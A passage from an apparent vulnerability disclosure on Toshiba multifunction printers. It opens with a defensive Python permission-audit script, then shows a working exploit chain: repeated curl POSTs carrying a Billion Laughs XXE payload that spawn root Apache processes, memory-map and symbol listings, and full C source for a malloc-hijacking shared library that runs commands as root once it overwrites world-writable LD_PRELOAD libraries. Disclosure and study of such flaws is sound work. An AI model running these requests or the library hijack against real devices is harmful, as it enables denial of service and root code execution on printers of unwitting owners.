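Added example; not the article's code. A path is reported when the file it
finally resolves to is writable by 'other' (a root-owned 777 target behind
root-owned symlinks, as with sapphost.py) or when its parent directory is
world-writable without the sticky bit (as the 777 directories above are,
which lets anyone replace the file regardless of the file's own mode).
The directory tree is constructed in a temporary directory for the demo."""
import os
import stat
import tempfile


def _mode(path: str) -> int:
    return os.stat(path).st_mode      # os.stat follows symlinks, like execve/dlopen


def weakness(path: str):
    """Return a reason string if anyone could change what this path runs, else None."""
    real = os.path.realpath(path)
    fmode = _mode(real)
    if fmode & stat.S_IWOTH:
        return f"file mode {oct(fmode & 0o777)}"
    dmode = _mode(os.path.dirname(real))
    if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
        return f"parent directory mode {oct(dmode & 0o777)} without sticky bit"
    return None


def ld_preload_entries(value: str):
    """Split an LD_PRELOAD value; the device uses ':'-separated entries with a trailing ':'."""
    return [e for e in value.replace(" ", ":").split(":") if e]


def audit(paths, ld_preload: str = "") -> dict:
    """Map each weak path (after symlink resolution) to the reason it is weak."""
    findings = {}
    for p in list(paths) + ld_preload_entries(ld_preload):
        if not os.path.exists(p):       # dangling symlink or absent file: nothing to check
            continue
        reason = weakness(p)
        if reason:
            findings[os.path.realpath(p)] = reason
    return findings


def _mkdir(path: str, mode: int) -> None:
    os.makedirs(path, exist_ok=True)
    os.chmod(path, mode)              # explicit, so the umask cannot change the demo


def _touch(path: str, mode: int, text: str = "") -> None:
    with open(path, "w") as f:
        f.write(text)
    os.chmod(path, mode)


def build_demo_tree(root: str) -> tuple:
    """Constructed layout echoing the listings above (modes chosen to match them)."""
    _mkdir(f"{root}/common/bin", 0o755)
    _mkdir(f"{root}/thirdparty/bin", 0o755)
    _mkdir(f"{root}/release/bin", 0o755)
    _mkdir(f"{root}/ramdisk/al", 0o777)                       # drwxrwxrwx as in the listing
    _mkdir(f"{root}/registration/al/TopAccessPy", 0o755)
    _touch(f"{root}/common/bin/sapphost.py", 0o777, "print('boot')\n")
    os.symlink("../../common/bin/sapphost.py", f"{root}/thirdparty/bin/sapphost.py")
    os.symlink("../../thirdparty/bin/sapphost.py", f"{root}/release/bin/sapphost.py")
    _touch(f"{root}/ramdisk/al/libGetNameInfoInterface.so", 0o777)
    _touch(f"{root}/ramdisk/al/libGetAddtInfoInterface.so", 0o755)   # file fixed, directory not
    _touch(f"{root}/registration/al/TopAccessPy/development.ini", 0o666, "[app:main]\n")
    paths = [f"{root}/release/bin/sapphost.py",
             f"{root}/registration/al/TopAccessPy/development.ini"]
    ld_preload = (f"{root}/ramdisk/al/libGetNameInfoInterface.so:"
                  f"{root}/ramdisk/al/libGetAddtInfoInterface.so:")
    return paths, ld_preload


def demo() -> dict:
    """Run the audit on the constructed tree; keys are relative to the tree root."""
    root = tempfile.mkdtemp(prefix="mfp-perm-audit-")
    paths, ld_preload = build_demo_tree(root)
    real_root = os.path.realpath(root)
    return {os.path.relpath(k, real_root): v for k, v in audit(paths, ld_preload).items()}


if __name__ == "__main__":
    for path, reason in sorted(demo().items()):
        print(f"{path}: {reason}")
```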

For example, when 55 HTTP requests are sent to the printer, the printer dynamically creates new Apache processes running as root, as shown below. These new processes load and execute code from libGetNameInfoInterface.so and libGetAddtInfoInterface.so, and an attacker can overwrite either file to obtain remote code execution.

Using the HTTP request from the pre-auth blind XML External Entity (XXE) injection – DoS, we send 55 HTTP requests containing a Billion Laughs attack (only the last 3 are shown) to create new Apache processes in the remote printer:

kali% curl -i -s -k -X $'POST' \
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol "lol">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\x0d\x0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\x0d\x0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\x0d\x0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\x0d\x0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">\x0d\x0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\x0d\x0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\x0d\x0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\x0d\x0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>' \
$'http://10.0.0.1:8080/contentwebserver' &
[53] 2286190

kali% curl -i -s -k -X $'POST' \
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol "lol">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\x0d\x0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\x0d\x0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\x0d\x0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\x0d\x0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">\x0d\x0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\x0d\x0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\x0d\x0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\x0d\x0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>' \
$'http://10.0.0.1:8080/contentwebserver' &
[54] 2286192

kali% curl -i -s -k -X $'POST' \
-H $'Host: 10.0.0.1:8080' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'Content-Type: text/plain; charset=utf-8' -H $'csrfpId: 10.0.0.1.852d519a6fa9825fae857bac5c003da0' -H $'Content-Length: 760' -H $'Origin: http://10.0.0.1:8080' -H $'Connection: close' -H $'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol "lol">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\x0d\x0a <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\x0d\x0a <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">\x0d\x0a <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">\x0d\x0a <!ENTITY lol5 "&lol4;&lol4;&lol4;">\x0d\x0a <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">\x0d\x0a <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">\x0d\x0a <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">\x0d\x0a <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>' \
$'http://10.0.0.1:8080/contentwebserver' &
[55] 2286194

We can see that new Apache processes are created on the remote printer, with the LD_PRELOAD variable in their environment:

2023/05/27 11:31:42 CMD: UID=0     PID=4132   | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4131 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4130 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:42 CMD: UID=0 PID=4129 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4138 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4137 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4136 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4135 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4134 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4133 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4139 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:43 CMD: UID=0 PID=4140 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:44 CMD: UID=0 PID=4141 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:44 CMD: UID=0 PID=4142 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:45 CMD: UID=0 PID=4143 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:46 CMD: UID=0 PID=4145 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:46 CMD: UID=0 PID=4144 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4146 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:47 CMD: UID=0 PID=4147 | watch -n 3 -t if [ -e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod +x /root/sshd_start.sh && /root/sshd_start.sh && rm /root/sshd_start.sh || rm /root/sshd_start.sh; fi
2023/05/27 11:31:47 CMD: UID=0 PID=4151 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4150 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4149 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:47 CMD: UID=0 PID=4148 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4156 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4155 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4154 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4153 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4152 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start
2023/05/27 11:31:48 CMD: UID=0 PID=4158 | /usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf -k start

We can analyze a newly created Apache process. For example, the Apache process with PID 4129 loads a number of libraries and executes the code implemented in them:

bash-4.1# cat /proc/4129/maps
08048000-080bb000 r-xp 00000000 08:02 155908 /home/SYSROM_SRC/build/thirdparty/bin/httpd
080bb000-080bf000 rw-p 00072000 08:02 155908 /home/SYSROM_SRC/build/thirdparty/bin/httpd
080bf000-0833e000 rw-p 00000000 00:00 0 [heap]
0833e000-08360000 rw-p 00000000 00:00 0 [heap]
08360000-083e8000 rw-p 00000000 00:00 0 [heap]
4bc47000-4bc63000 r-xp 00000000 08:02 11770 /lib/ld-2.11.3.so
4bc63000-4bc64000 r--p 0001b000 08:02 11770 /lib/ld-2.11.3.so
4bc64000-4bc65000 rw-p 0001c000 08:02 11770 /lib/ld-2.11.3.so
4bc67000-4bda6000 r-xp 00000000 08:02 11750 /lib/libc-2.11.3.so
4bda6000-4bda7000 ---p 0013f000 08:02 11750 /lib/libc-2.11.3.so
4bda7000-4bda9000 r--p 0013f000 08:02 11750 /lib/libc-2.11.3.so
4bda9000-4bdaa000 rw-p 00141000 08:02 11750 /lib/libc-2.11.3.so
4bdaa000-4bdad000 rw-p 00000000 00:00 0
4bdaf000-4bdb1000 r-xp 00000000 08:02 11665 /lib/libdl-2.11.3.so
4bdb1000-4bdb2000 r--p 00001000 08:02 11665 /lib/libdl-2.11.3.so
4bdb2000-4bdb3000 rw-p 00002000 08:02 11665 /lib/libdl-2.11.3.so
4bdbf000-4bddf000 r-xp 00000000 08:02 139743 /usr/lib/libpcre.so.3.12.1
4bddf000-4bde0000 rw-p 0001f000 08:02 139743 /usr/lib/libpcre.so.3.12.1
4bdee000-4bdf0000 r-xp 00000000 08:02 144969 /usr/lib/libcom_err.so.2.1
4bdf0000-4bdf1000 rw-p 00001000 08:02 144969 /usr/lib/libcom_err.so.2.1
4bdfa000-4be0c000 r-xp 00000000 08:02 145525 /usr/lib/libz.so.1.2.3
4be0c000-4be0d000 rw-p 00011000 08:02 145525 /usr/lib/libz.so.1.2.3
4be0f000-4be12000 r-xp 00000000 08:02 144902 /usr/lib/libuuid.so.1.3.0
4be12000-4be13000 rw-p 00002000 08:02 144902 /usr/lib/libuuid.so.1.3.0
4be15000-4be1c000 r-xp 00000000 08:02 11732 /lib/librt-2.11.3.so
4be1c000-4be1d000 r--p 00006000 08:02 11732 /lib/librt-2.11.3.so
4be1d000-4be1e000 rw-p 00007000 08:02 11732 /lib/librt-2.11.3.so
4be7e000-4be9f000 r-xp 00000000 08:02 142900 /usr/lib/libk5crypto.so.3.1
4be9f000-4bea0000 rw-p 00021000 08:02 142900 /usr/lib/libk5crypto.so.3.1
4bea7000-4bead000 r-xp 00000000 08:02 140031 /usr/lib/libkrb5support.so.0.1
4bead000-4beae000 rw-p 00005000 08:02 140031 /usr/lib/libkrb5support.so.0.1
4c04f000-4c133000 r-xp 00000000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
4c133000-4c137000 r--p 000e4000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
4c137000-4c138000 rw-p 000e8000 08:02 145085 /usr/lib/libstdc++.so.6.0.13
...
710a3000-710a5000 r-xp 00000000 08:02 153564 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so
710a5000-710a6000 rw-p 00001000 08:02 153564 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so
710a6000-710a9000 r-xp 00000000 08:02 154158 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so
710a9000-710aa000 rw-p 00002000 08:02 154158 /home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so
710aa000-710b4000 r-xp 00000000 08:02 154478 /home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so
710b4000-710b5000 rw-p 00009000 08:02 154478 /home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so
...
75674000-75677000 r--p 00064000 08:02 153751 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
75677000-7567b000 rw-p 00067000 08:02 153751 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
7567b000-756b0000 r-xp 00000000 08:02 154613 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
756b0000-756b3000 rw-p 00034000 08:02 154613 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
756b3000-756bd000 r-xp 00000000 08:02 11632 /lib/libpam.so.0.82.2
756bd000-756be000 rw-p 0000a000 08:02 11632 /lib/libpam.so.0.82.2
756be000-76217000 r-xp 00000000 08:02 21362 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
76217000-76258000 rw-p 00b58000 08:02 21362 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
76258000-7625f000 rw-p 00000000 00:00 0
7625f000-7626a000 r-xp 00000000 08:02 20801 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
7626a000-7626b000 rw-p 0000a000 08:02 20801 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
7626b000-76273000 r-xp 00000000 08:02 20878 /home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0
76273000-76274000 rw-p 00007000 08:02 20878 /home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0
76274000-76275000 ---p 00000000 00:00 0
76275000-76a74000 rwxp 00000000 00:00 0
76a74000-76a77000 rw-p 00000000 00:00 0
76a77000-76a7b000 r-xp 00000000 08:02 11633 /lib/libattr.so.1.1.0
76a7b000-76a7c000 rw-p 00003000 08:02 11633 /lib/libattr.so.1.1.0
76a7c000-76a82000 r-xp 00000000 08:02 11721 /lib/libacl.so.1.1.0
76a82000-76a83000 rw-p 00005000 08:02 11721 /lib/libacl.so.1.1.0
76a83000-76a84000 rw-p 00000000 00:00 0
76a84000-76af3000 r-xp 00000000 08:02 21782 /home/SYSROM_SRC/build/release/lib/libcios.so.0
76af3000-76af7000 rw-p 0006f000 08:02 21782 /home/SYSROM_SRC/build/release/lib/libcios.so.0
76af7000-76b50000 r-xp 00000000 08:02 145519 /usr/lib/libintlc.so.5
76b50000-76b53000 rw-p 00059000 08:02 145519 /usr/lib/libintlc.so.5
76b53000-76b5c000 r-xp 00000000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5c000-76b5d000 r--p 00008000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5d000-76b5e000 rw-p 00009000 08:02 11622 /lib/libcrypt-2.11.3.so
76b5e000-76b85000 rw-p 00000000 00:00 0
76b85000-76b97000 r-xp 00000000 08:02 154448 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
76b97000-76b98000 rw-p 00012000 08:02 154448 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
76b98000-76b99000 rw-p 00000000 00:00 0
76b99000-76b9c000 r-xp 00000000 08:02 154186 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
76b9c000-76b9d000 rw-p 00002000 08:02 154186 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
76b9d000-76bc4000 r-xp 00000000 08:02 154600 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
76bc4000-76bc5000 rw-p 00027000 08:02 154600 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
76bc5000-76c64000 r-xp 00000000 08:02 154326 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
76c64000-76c67000 rw-p 0009f000 08:02 154326 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
76c67000-76c96000 r-xp 00000000 08:02 153499 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
76c96000-76c99000 rw-p 0002e000 08:02 153499 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
76c99000-76c9a000 rw-p 00000000 00:00 0
76c9a000-76d0b000 r-xp 00000000 08:02 153648 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
76d0b000-76d0d000 rw-p 00070000 08:02 153648 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
76d0d000-76d0e000 rw-p 00000000 00:00 0
76d0e000-76d4d000 r-xp 00000000 08:02 154400 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
76d4d000-76d4f000 rw-p 0003f000 08:02 154400 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
76d4f000-76d55000 r-xp 00000000 08:02 145615 /usr/lib/libirng.so
76d55000-76d58000 rw-p 00005000 08:02 145615 /usr/lib/libirng.so
76d58000-76d6b000 r-xp 00000000 08:02 21737 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
76d6b000-76d6c000 rw-p 00012000 08:02 21737 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
76d6c000-77568000 r-xp 00000000 08:02 157246 /mfp/lib/libsvml.so
77568000-77586000 rw-p 007fc000 08:02 157246 /mfp/lib/libsvml.so
77586000-77587000 rw-p 00000000 00:00 0
77587000-775ad000 r-xp 00000000 08:02 11746 /lib/libm-2.11.3.so
775ad000-775ae000 r--p 00025000 08:02 11746 /lib/libm-2.11.3.so
775ae000-775af000 rw-p 00026000 08:02 11746 /lib/libm-2.11.3.so
775af000-77624000 r-xp 00000000 08:02 145632 /usr/lib/libsqlite3.so.0.8.6
77624000-77626000 rw-p 00074000 08:02 145632 /usr/lib/libsqlite3.so.0.8.6
77626000-77627000 rw-p 00000000 00:00 0
77627000-77695000 r-xp 00000000 08:02 154620 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
77695000-77698000 rw-p 0006e000 08:02 154620 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
77698000-776ad000 r-xp 00000000 08:02 11629 /lib/libpthread-2.11.3.so
776ad000-776ae000 r--p 00014000 08:02 11629 /lib/libpthread-2.11.3.so
776ae000-776af000 rw-p 00015000 08:02 11629 /lib/libpthread-2.11.3.so
776af000-776b2000 rw-p 00000000 00:00 0
776b2000-776db000 r-xp 00000000 08:02 153455 /home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0
776db000-776dd000 rw-p 00028000 08:02 153455 /home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0
776dd000-776fb000 r-xp 00000000 08:02 154622 /home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1
776fb000-776fd000 rw-p 0001e000 08:02 154622 /home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1
776fd000-776fe000 rw-p 00000000 00:00 0
776fe000-77702000 r-xp 00000000 08:02 154313 /home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so
77702000-77703000 rw-p 00003000 08:02 154313 /home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so
77703000-77712000 r-xp 00000000 00:0d 10594 /ramdisk/al/libGetAddtInfoInterface.so
77712000-77714000 rw-p 0000e000 00:0d 10594 /ramdisk/al/libGetAddtInfoInterface.so
77714000-77715000 rw-p 00000000 00:00 0
77715000-77720000 r-xp 00000000 00:0d 11406 /ramdisk/al/libGetNameInfoInterface.so
77720000-77722000 rw-p 0000a000 00:0d 11406 /ramdisk/al/libGetNameInfoInterface.so

Because of the weak permissions, we can overwrite hundreds of libraries to obtain remote code execution.

We can overwrite the 2 libraries loaded by default by the programs running inside the printer:

  • /ramdisk/al/libGetAddtInfoInterface.so

  • /ramdisk/al/libGetNameInfoInterface.so

These two libraries export Intel-optimized functions.

Exported functions found in the LD_PRELOAD library:

kali% nm -D /home/user/research/printers/topaccess/4.50-latest-version/4.50-new-version/extract/home/SYSROM_SRC/build/release/lib/libGetNameInfoInterface.so.0
0000cf40 A __bss_start
00009150 T __cacheSize
w __cxa_finalize@GLIBC_2.1.3
U dlsym@GLIBC_2.0
0000cf40 A _edata
0000cfc0 A _end
00009d04 T _fini
00002340 T getnameinfo
00002290 T getNameInfoWrapper
w __gmon_start__
00002088 T _init
00009cb0 T __intel_f2int
00002530 T _intel_fast_memcpy
00002440 T _intel_fast_memcpy.A
00002500 T _intel_fast_memcpy.H
00002470 T _intel_fast_memcpy.J
000024a0 T _intel_fast_memcpy.M
000024d0 T _intel_fast_memcpy.P
000026f0 T _intel_fast_memset
00002600 T _intel_fast_memset.A
00002660 T _intel_fast_memset.H
00002630 T _intel_fast_memset.J
00002690 T _intel_fast_memset.M
000026c0 T _intel_fast_memset.P
000027cc T __intel_memcpy
000033fd T __intel_memset
000027c0 T __intel_new_memcpy
00003b10 T __intel_new_memcpy_P3
000033f0 T __intel_new_memset
00004a90 T __intel_new_memset_P3
000051e0 T __intel_sse2_memset
00005850 T __intel_sse2_rep_memset
00005dd0 T __intel_ssse3_memcpy
00007dc0 T __intel_ssse3_rep_memcpy
w _Jv_RegisterClasses
U memcpy@GLIBC_2.0
U memset@GLIBC_2.0
U pthread_create@GLIBC_2.1
U pthread_join@GLIBC_2.0
kali%

An attacker can create a new library that exports a function every program uses, for example malloc().

A custom library was written that hijacks the control flow of the malloc() function:

kali% cat Makefile
all:
	rm /home/user/research/printers/topaccess/malloc/malloc.so
	gcc -o malloc.so -m32 -shared -fPIC malloc.c

kali% cat malloc.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>

void *malloc(size_t size)
{
    static void *(*fptr)(size_t) = NULL;

    if (fptr == NULL)
    {
        fptr = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");
        if (fptr == NULL)
        {
            printf("dlsym: %s\n", dlerror());
            return NULL;
        }
    }

    system("LD_PRELOAD='' id > /dev/shm/id");

    return (*fptr)(size);
}
kali% make
rm /home/user/research/printers/topaccess/malloc/malloc.so
gcc -o malloc.so -m32 -shared -fPIC malloc.c
kali% ls -la
total 32
drwx------ 2 user user 4096 May 13 11:04 .
drwx------ 4 user user 4096 May 13 11:02 ..
-rw------- 1 user user 112 May 13 11:04 Makefile
-rw------- 1 user user 398 May 13 11:03 malloc.c
-rwx------ 1 user user 14696 May 13 11:04 malloc.so
kali%

When this library is uploaded as /ramdisk/al/libGetAddtInfoInterface.so or /ramdisk/al/libGetNameInfoInterface.so, the malloc() function is executed by some of the programs running inside the printer, and the id command is executed as root (its output is written to /dev/shm/id).

A side effect is that many programs also crash. The malicious payload is still executed.

Program crashes can be avoided by targeting only specific functions used by Apache, or specific programs inside the printer.

Other ways to obtain remote code execution

An attacker can use other vulnerabilities to obtain remote code execution:

  • Local privilege escalation and remote code execution using an insecure PATH

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-path

  • Local privilege escalation and remote code execution using an insecure LD_PRELOAD

    https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html#lpe-rce-ld-preload

